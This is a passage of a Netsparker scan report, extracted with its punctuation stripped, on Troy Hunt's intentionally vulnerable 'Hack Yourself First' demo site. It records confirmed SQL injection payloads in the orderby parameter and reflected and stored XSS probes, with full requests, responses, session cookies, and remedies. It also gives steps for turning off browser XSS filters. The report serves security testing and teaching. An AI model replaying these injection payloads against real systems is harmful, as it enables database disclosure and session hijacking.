[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
24 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
13 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
14 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
